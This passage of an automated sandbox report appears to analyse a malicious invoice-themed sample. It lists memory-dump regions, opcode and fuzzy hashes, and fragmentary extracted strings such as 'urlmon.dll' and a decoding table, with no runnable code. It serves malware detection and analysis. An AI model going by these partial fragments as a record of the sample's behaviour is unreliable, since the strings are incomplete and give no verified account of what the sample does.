                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C95120B6E04218AFEF48CF99D840ADDBBB2BF58354F14806AE815BB350DB34A941CF50
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                                                                                                          • Opcode ID: 40092c7d15b96312cfddb75505ef32c7ece128b22e560e06cef42fd4913e6592
                                                                                                                                                                                                                          • Instruction ID: 61903b723cf29304bd7ad4d6c72f1cce53b2f3a82f057de13a5874e156b7c042
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40092c7d15b96312cfddb75505ef32c7ece128b22e560e06cef42fd4913e6592
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6325974E05369DFEB2ACF64C846BD9BBB1BF08304F0040E9D449A7261DBB49A95CF90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: ${M5
                                                                                                                                                                                                                          • API String ID: 0-1177445209
                                                                                                                                                                                                                          • Opcode ID: ca56b28df818a8c8f5f13ce6a78d2a44b9b359b1c99c6256ef9e03c04c90fc8a
                                                                                                                                                                                                                          • Instruction ID: e6958d08b9ddb55af5698457c45534a9c46078eb8da54f3cf37c42bc4c1d8bc4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca56b28df818a8c8f5f13ce6a78d2a44b9b359b1c99c6256ef9e03c04c90fc8a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9B18A716093019FD718CF28C890A6BFBF5BF84754F504A6EF9949B2A6D730D904CB92
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0$Flst
                                                                                                                                                                                                                          • API String ID: 0-758220159
                                                                                                                                                                                                                          • Opcode ID: f71684e7b6c08cf9921fd4548bc776a3fc11c494950502b0b0adfab046893f0d
                                                                                                                                                                                                                          • Instruction ID: 4734e0bc80d55efeb541ec246253704797a122e947f62bc1ebd8efd18aebfd7c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f71684e7b6c08cf9921fd4548bc776a3fc11c494950502b0b0adfab046893f0d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F518CB6A007488FEB19CF99E494B99FBF5FF44758F1580AED0459B340EBB09981CB80
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 35430586
                                                                                                                                                                                                                          • kLsE, xrefs: 354305FE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                          • API String ID: 3446177414-2547482624
                                                                                                                                                                                                                          • Opcode ID: fdcb384088c902403c79e10185c8a44057f02011911612e71876d1752ffbb14b
                                                                                                                                                                                                                          • Instruction ID: 2ba507ecdf69f2bee550425f9da74cdd4239d2c0c7bcfb6a6d17ed08c154ceb6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fdcb384088c902403c79e10185c8a44057f02011911612e71876d1752ffbb14b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E51C0B5A02745DFEB18DFA5C4416AAB7F4BF48300F00867ED5DA83260EB70A515CB62
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: 0$0
                                                                                                                                                                                                                          • API String ID: 3446177414-203156872
                                                                                                                                                                                                                          • Opcode ID: 52a4560445d19c79f9600df659bd1db5b9d5c1cb0b3ac983169731219c1c9b81
                                                                                                                                                                                                                          • Instruction ID: 555c9e58bb9c5f0718e6b0dbac234bdf825bca701c7e98af124446f35d3b568a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52a4560445d19c79f9600df659bd1db5b9d5c1cb0b3ac983169731219c1c9b81
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 314179B16087529FD304CF28C484A5ABBE5BF88354F014A6EF888DB300D771EA06CB86
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: ^B5
                                                                                                                                                                                                                          • API String ID: 3446177414-833176065
                                                                                                                                                                                                                          • Opcode ID: 41162716ceff7e7e86e7795ed11d2a41cd9a1c6a3d83b82af9434bc098623de5
                                                                                                                                                                                                                          • Instruction ID: 8e39f219157051898ca59ea588da1a5d0c2b8140583c8031a13a2f05c7851f83
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41162716ceff7e7e86e7795ed11d2a41cd9a1c6a3d83b82af9434bc098623de5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E4172B9A04311DFD719CF1AC4849657BF6FF99750B5080AAEC09CB360DB71E8A1CBA0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • ZKP, xrefs: 354CAAD1
                                                                                                                                                                                                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 354CAABF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p$ZKP
                                                                                                                                                                                                                          • API String ID: 3446177414-1741731416
                                                                                                                                                                                                                          • Opcode ID: 3e0b8a0338bb0079abee6e87abeb9c0f53e01d13c0cfa2565b4267d9602041c5
                                                                                                                                                                                                                          • Instruction ID: 5973fbc8aba28fe7918be5d046ad30f8fec75c291566c64977e43d1d843c07e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e0b8a0338bb0079abee6e87abeb9c0f53e01d13c0cfa2565b4267d9602041c5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A3139B6A00608EFD709CF55CD44F5AB7B6FB84B10F1186A9FA05A7780DB35A941CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: B5$mB5
                                                                                                                                                                                                                          • API String ID: 3446177414-894363284
                                                                                                                                                                                                                          • Opcode ID: 9d95abd364848063cfcb9bee06f0c33a8892051bab550f16eae153a6a0080aa9
                                                                                                                                                                                                                          • Instruction ID: ca359f34ee775bdfe72a0987ba9b500469b120ba37a22521618d2e1630e8297a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d95abd364848063cfcb9bee06f0c33a8892051bab550f16eae153a6a0080aa9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB11C3B6A01218AFDF15CF98D985ADEBBB9FF4C360F10401AF911B7240D735AA54CBA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6065e56e41eda0dfed6923fcdce289a30135a95ff3bdd7565fe76e1b9cf0abac
                                                                                                                                                                                                                          • Instruction ID: b31ebeee33e1b3f385bb0c47511dfb81ffff66b303153c830c20787226a4b68c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6065e56e41eda0dfed6923fcdce289a30135a95ff3bdd7565fe76e1b9cf0abac
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F231B251A587F14ED30E836D08B9675AFC18F5620174EC2EEDADA6F2E3C4898408D3A5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 2$ ]$"$#N$#}$&$.$.$2%$7$88$:$=&$>$>$>Z$A$C2$F$F$G!$I$M$O$P>$Q$W$X$Z$[>C2$[Y$]$`$d$e$g$j$kX$l}$nT$r$t$w$w$y7$|Y$|b
                                                                                                                                                                                                                          • API String ID: 0-3453730861
                                                                                                                                                                                                                          • Opcode ID: 38700b62496774b92eb2fa8c054e8321830108fe542d8aa111838201b81f4108
                                                                                                                                                                                                                          • Instruction ID: 3a17682615e98a944e9d31285fc7060e0c3bbfdfb2af3ee1a076e1480e5da5a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38700b62496774b92eb2fa8c054e8321830108fe542d8aa111838201b81f4108
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F528EB0D05229CBEB25CF44C9987DDBBB2BB59308F1081DAD5497B281D7BA5AC5CF40
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 6$O$S$\$s
                                                                                                                                                                                                                          • API String ID: 0-3854637164
                                                                                                                                                                                                                          • Opcode ID: 629d9f8fd33bb69b0c774539424d6b70700ef3ec872140cc26d158b4eaa0fb54
                                                                                                                                                                                                                          • Instruction ID: 6d199cfa4c3878f99fde53e83455e03479e695c0a82189672f6547baad412969
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 629d9f8fd33bb69b0c774539424d6b70700ef3ec872140cc26d158b4eaa0fb54
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B251A272D00218ABDB10DF94DD89FFFB378EF84715F04469AED085A240E7759A49CBA1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: <m
                                                                                                                                                                                                                          • API String ID: 0-19494629
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: u
                                                                                                                                                                                                                          • API String ID: 0-687849348
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: J
                                                                                                                                                                                                                          • API String ID: 0-1141589763
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                                                                                                                                          • API String ID: 0-3248090998
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                                                                                                                                          • API String ID: 0-1002149817
                                                                                                                                                                                                                          • Opcode ID: 2b94cb816d906ef9726588da948cd06baee68c622b3df9941117fbb6426a9880
                                                                                                                                                                                                                          • Instruction ID: ec367256edf77315425d2843aa7c02ac95d1e8879edb165b2d17647443a6c1f0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b94cb816d906ef9726588da948cd06baee68c622b3df9941117fbb6426a9880
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CC140B1D013689EDB20DFA4CD44BEEBBB9AF05304F0085DAD54CAB241E7B55A88CF65
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                                                                                                                          • API String ID: 0-392141074
                                                                                                                                                                                                                          • Opcode ID: 266abc8d240435951306767dcddad510e5cad1a61a035b3f77ad4f5c22beebbc
                                                                                                                                                                                                                          • Instruction ID: aae53df585e52f66236f3de9893991677212a4389579ee00d7710507dff7b0d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 266abc8d240435951306767dcddad510e5cad1a61a035b3f77ad4f5c22beebbc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE716CB5C00718AADB25DFA4CD85FEEB77CBF48300F04459EE509AA240EB755B488FA1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                                                                                                                          • API String ID: 0-392141074
                                                                                                                                                                                                                          • Opcode ID: 8b9324ce1ccaad779d96e5f6e3ecf20613541b119aefd33250fb675f8f5e985b
                                                                                                                                                                                                                          • Instruction ID: 897c8952e54ff4b9de5e69d10fa17a46a65e45b78ff07111da943d2341a14527
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b9324ce1ccaad779d96e5f6e3ecf20613541b119aefd33250fb675f8f5e985b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 686159B5800318AADB25DFE4CD85FEEB77CBF48300F04459EE509AA240EB755B488FA1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                                                                                                          • API String ID: 0-685823316
                                                                                                                                                                                                                          • Opcode ID: e5f7c3db3805ccb616a7007d03cbe65a8cdb124bba6911f163b650bfc09660c3
                                                                                                                                                                                                                          • Instruction ID: 6c939aa076d8f8b966fcf802fc2393ef75d00f1e08aa454ed7cb9a9e89b47712
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5f7c3db3805ccb616a7007d03cbe65a8cdb124bba6911f163b650bfc09660c3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B82161B5D4131CAADB50DFA4CC85FEEBBB9BF04700F10815DE618BA280DBB556488BA4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: .$P$e$i$m$o$r$x
                                                                                                                                                                                                                          • API String ID: 0-620024284
                                                                                                                                                                                                                          • Opcode ID: c7e42513e10aeaa77825d5703d96e8c40b6cc8bd2bee33818cfff3dae11274bb
                                                                                                                                                                                                                          • Instruction ID: d947330771b67eb5ede80db12010332dfff2fee9725300fce560f3f37aa2fa11
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7e42513e10aeaa77825d5703d96e8c40b6cc8bd2bee33818cfff3dae11274bb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A951A9B98003186ADB21DFA0CD85FDE737DAF54300F0089DEA50D9B241EBB597898FA5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: *$.$3$4$F$G8k$T$|
                                                                                                                                                                                                                          • API String ID: 0-1677524064
                                                                                                                                                                                                                          • Opcode ID: 3022845aab4da92e13536ed1902619ea6677fc90db794137598faadd80313730
                                                                                                                                                                                                                          • Instruction ID: b56adba0bfa368817ce3a585a29fd24090af7387a350078ad5c9b90a8970bbc0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3022845aab4da92e13536ed1902619ea6677fc90db794137598faadd80313730
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E11DE10D0C3CED9DF12C7AC84587AEFF715F12258F4882D9D9A46B2C2D279470AC7A6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: L$S$\$a$c$e$l
                                                                                                                                                                                                                          • API String ID: 0-3322591375
                                                                                                                                                                                                                          • Opcode ID: 09f97a703cc8bee06f9b94275bc6c1928ee3870435e3e340437aaa374fc779bd
                                                                                                                                                                                                                          • Instruction ID: 9bad869034c8f12ed750aa557e74f1d304539f3b4e01962e8650108c5bb2705e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09f97a703cc8bee06f9b94275bc6c1928ee3870435e3e340437aaa374fc779bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B04196B2C00318AECB10DFA8DC85FEEB7F8AF88310F05469FD909A7200E77555458B94
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 4$@QL@$DX]W$U@][$UB]R$UDDX$]WU@
                                                                                                                                                                                                                          • API String ID: 0-3291571695
                                                                                                                                                                                                                          • Opcode ID: a3a9ad84e0d38c4614adda14fcc5887cb3fa3670ca711d3dd80549722ad723cb
                                                                                                                                                                                                                          • Instruction ID: 8db20b70707f153f742506f86b4defe9b49801e06a6fd218231b703e01796371
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3a9ad84e0d38c4614adda14fcc5887cb3fa3670ca711d3dd80549722ad723cb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 541130B0C05288ABDB04DFA5A9906DEFFB4FB11324F604118E42A7F204D7354A42CF94
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: F$P$T$f$r$x
                                                                                                                                                                                                                          • API String ID: 0-2523166886
                                                                                                                                                                                                                          • Opcode ID: 2058e128c8a07acd5e0be5572ec78ad0bcc3c71184b8730fc11f4b410895a2d3
                                                                                                                                                                                                                          • Instruction ID: 46e979033fd16242d47384fe67044c45aeae0a48e2f8da3124c41dfcdb4faa66
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2058e128c8a07acd5e0be5572ec78ad0bcc3c71184b8730fc11f4b410895a2d3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9651D371910705AADB34DF74CD88BEBF7B8FF14704F04461EE459AA280E7B6A644CB91
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $i$l$o$u
                                                                                                                                                                                                                          • API String ID: 0-2051669658
                                                                                                                                                                                                                          • Opcode ID: dc113726ada927580b6510bce2f9a351bd2bbfd295cd5cddce6e3ecf09a2f6bc
                                                                                                                                                                                                                          • Instruction ID: e2f57724584ab7f0f57d30fe123108882f2c65b8a170b65068894c43349b4173
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc113726ada927580b6510bce2f9a351bd2bbfd295cd5cddce6e3ecf09a2f6bc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE615FB5900308AFCB24DBA4CC84FEFB7FDAB88714F14455EE519A7240EB35AA45CB60
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
